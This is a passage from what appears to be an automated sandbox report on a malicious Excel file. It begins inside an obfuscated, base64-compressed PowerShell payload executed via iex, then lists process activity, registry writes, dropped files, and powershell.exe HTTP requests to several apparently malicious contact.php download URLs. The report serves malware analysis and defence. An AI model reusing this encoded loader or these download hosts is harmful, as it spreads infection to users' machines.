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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX | C:\WINDOWS\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 452 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | POWeRsHEll.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 1084 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | POWeRsHEll.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4000 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 1948 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | POWeRsHEll.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4000 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 5836 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 2692 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | POWeRsHEll.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4000 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 1080 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
Total events
16 761
Read events
16 046
Write events
648
Delete events
67
Modification events
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling |
| Operation: | write | Name: | 1 |
Value: 01D014000000001000BE4E402C04000000000000000400000000000000 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | en-US |
Value: 2 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | en-US |
Value: 1 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | it-IT |
Value: 1 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | 8l( |
Value: 386C2800CC1500000100000000000000F3F2E4E77268D50100000000 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | hl( |
Value: 686C2800CC1500000000044001000000F857E7E77268D501D2060000AC3AACC95C405A4883AEC3C90A3DBA78F857E7E77268D5010000000000001000BE4E402C0000000006000000000000000200000000000000000000000000556E6B6E6F776E00000000000000000000000000000000000000000000000000000000000000000000000000000000000DF0ADDE0DF0ADDE0DF0ADDE0DF0ADDE440045004600410055004C005400000000001D07FE01000002000000FE7F000000000000000000000000000000000000A8F40FA287000000200000000000000030000000000000002BAB8F7AFE7F00000000000000000000300000000000000000121B07FE010000000000000000000000001B07FE01000018012409FE0100001000000000000000200000000000000040000000000000002BAB8F7AFE7F00004000000000000000C00C1B07FE0100003B00000000000000400000000000000080002409FE010000000000000000000080161B07FE01000000000000FE7F000000001B07FE010000105F2009FE0100004000000000000000300000000000000000001D07FE010000D289019DFE7F00004000000000000000C00C1B07FE0100002C00000000000000700000000000000060F30FA287000000000000000000000000000000000000002C00000000000000000000000000000007000000000000007000000000000000600000000000000000001D07FE010000D289019DFE7F0000400000000000000000000000870000006000000000000000000000008700000080161B07FE010000000000000000000000001B07FE010000105F2009FE01000030000000000000002BAB8F7AFE7F000030000000000000007668019DFE7F000070F30FA287000000C00C1B07FE010000080000000000000070000000000000003000000000000000440045004600410055004C00540000000201000000000000000000000000000007000000000000007000000000000000600000000000000000001D07FE010000D289019DFE7F0000400000000000000000000000FE0100006000000000000000000000000000000000001D07FE0100009CBB019DFE7F0000F0060000000000001C000000000000001C00000000000000E0000000000000004000000000000000706BED08FE01000000001C00FE010000000000000000000000000000000000000100000000000000000000000000000090542009FE01000010000000000000002200000039000000000000000000000080542009FE01000080542009FE010000FF0300000000000080000000000000001001000000000000330000000000000033000000000000003300000000000000CFA28F7AFE7F00000C00000000000000000000000000000000031D07FE0100001C00000000000000B651FFFF6D0000000000000093FFFFFF30000000000000003CB11D07FE01000050011D07FE010000A20000000000000069F50FA287000000000000000000000004031D07FE01000033000000000000000C00000CFE010000FEFFFFFFFFFFFFFF02000002FE010000F0EE2307FE0100002C00000000000000400E2109FE0100001C00001C00000000F0060000000000003882967AFE7F00007668019DFE7F000033000000000000001D00000000000000440045004600410055004C00540000000C0000000000000002000002FE7F000068E4967AFE7F0000000000000000000000000000000000000F01000EFE7F00007007EC08FE010000B9AE081FFE7F000000001D07FE0100000200000200000000000000000000000000001D07FE01000000000000000000007668019DFE7F000030401D09FE010000390000398700000069F50FA287000000149E8F7AFE7F0000A8F60FA28700000040F50FA28700000068E4967AFE7F000040E4967AFE7F000000000000000000000000000000000000020100000000000000000000000000006F00000000000000F00600000000000000001D07FE010000AB8E019DFE7F000000001D07FE0100000200000000000000E006000000000000F00600000000000088061D07FE01000068F50FA28700000030FE1D09FE01000003000000FE7F0000FEFFFFFFFFFFFFFF000000000000000038F60FA28700000046F47D7AFE7F0000F0001E09FE010000E658B279FE7F0000000000000000000080DB0509FE01000000121B07FE010000E658B279FE7F00000100000000000000F0EEE975FE7F0000020100000000000000000000000000000800000000000000C348FA77FE7F000000552009FE010000E00600000000000010FA0FA287000000000000000000000090542009FE010000CB4BFA77FE7F0000A0542009FE01000010FA0FA2870000005ED143BAF568D501000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (5580) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
Executable files
0
Suspicious files
10
Text files
42
Unknown types
8
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oq0mj0bl.qco.ps1 | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0ukqoure.xp3.psm1 | — | |
MD5:— | SHA256:— | |||
| 5580 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF50A0A51BF34986B5.TMP | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\V.xml | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Meta\WS.xml | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Stat\S.xml | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Def\WD.xaml | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Def\RA.xml | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Meta\I.xml | — | |
MD5:— | SHA256:— | |||
| 556 | POWeRsHEll.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Meta\UI.xml | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
25
TCP/UDP connections
23
DNS requests
15
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2692 | powershell.exe | GET | 200 | 207.159.143.179:80 | http://jentygelbviehs.com/contact.php?h450m04a | US | html | 7.88 Kb | unknown |
3404 | powershell.exe | GET | 200 | 91.120.235.243:443 | https://cmas.org/contact.php?sxv5zceg | HU | html | 28.2 Kb | whitelisted |
5580 | EXCEL.EXE | GET | 200 | 52.109.76.6:443 | https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1040&uilcid=1033&build=16.0.11328&crev=3 | IE | xml | 106 Kb | whitelisted |
5464 | svchost.exe | POST | 200 | 40.90.137.126:443 | https://login.live.com/RST2.srf | US | xml | 9.89 Kb | whitelisted |
1948 | powershell.exe | GET | 409 | 173.254.48.196:80 | http://purigopabali.com/contact.php?kn3qrjp5 | US | html | 83 b | unknown |
5580 | EXCEL.EXE | GET | 200 | 13.107.3.128:443 | https://config.edge.skype.com/config/v1/Office/16.0.11328.20158?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.11328.20158&MsoVersion=16.0.11328.20156&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7bC9AC3AAC-405C-485A-83AE-C3C90A3DBA78%7d&LabMachine=false | US | text | 59.9 Kb | whitelisted |
5580 | EXCEL.EXE | GET | 200 | 52.109.76.32:443 | https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.11328.20158&ClientId=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.11328.20158& | IE | xml | 307 Kb | whitelisted |
3404 | powershell.exe | GET | 302 | 91.120.235.243:80 | http://cmas.org/contact.php?sxv5zceg | HU | html | 221 b | whitelisted |
5396 | powershell.exe | GET | 200 | 43.241.57.18:80 | http://amatapatong.com/contact.php?m51hbvx0 | TH | html | 26.6 Kb | unknown |
2736 | EXCEL.EXE | POST | 200 | 52.114.75.79:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 60 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
5464 | svchost.exe | 40.90.137.126:443 | login.live.com | Microsoft Corporation | US | unknown |
5580 | EXCEL.EXE | 13.107.3.128:443 | config.edge.skype.com | Microsoft Corporation | US | whitelisted |
5580 | EXCEL.EXE | 52.114.77.33:443 | self.events.data.microsoft.com | Microsoft Corporation | IE | suspicious |
3404 | powershell.exe | 91.120.235.243:443 | cmas.org | T-Mobile Czech Republic a.s. | HU | unknown |
3404 | powershell.exe | 91.120.235.243:80 | cmas.org | T-Mobile Czech Republic a.s. | HU | unknown |
5396 | powershell.exe | 43.241.57.18:80 | amatapatong.com | dragonhispeed | TH | unknown |
1948 | powershell.exe | 173.254.48.196:80 | purigopabali.com | Unified Layer | US | unknown |
5580 | EXCEL.EXE | 52.109.76.32:443 | nexusrules.officeapps.live.com | Microsoft Corporation | IE | whitelisted |
5580 | EXCEL.EXE | 52.109.76.6:443 | officeclient.microsoft.com | Microsoft Corporation | IE | whitelisted |
2692 | powershell.exe | 207.159.143.179:80 | jentygelbviehs.com | Peer 1 Network (USA) Inc. | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
config.edge.skype.com |
| whitelisted |
login.live.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
cmas.org |
| whitelisted |
jentygelbviehs.com |
| unknown |
amatapatong.com |
| unknown |
officeclient.microsoft.com |
| whitelisted |
purigopabali.com |
| unknown |
nexusrules.officeapps.live.com |
| whitelisted |
eurekalert.org |
| whitelisted |
Threats
Process | Message |
|---|---|
EXCEL.EXE | 2019-09-11 07:31:32.105 T#5456 <E> [AriaSDK] HTTP request WI-2 failed after 110 ms, events were rejected by the server (403) and will be all dropped
|
EXCEL.EXE | 2019-09-11 07:37:11.589 T#5552 <E> [AriaSDK.PAL] PAL is already shutdown!
|
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | The network address is invalid. (Exception from HRESULT: 0x800706AB)
|
mmc.exe | The network address is invalid. (Exception from HRESULT: 0x800706AB)
|
mmc.exe | The remote computer was not found.
|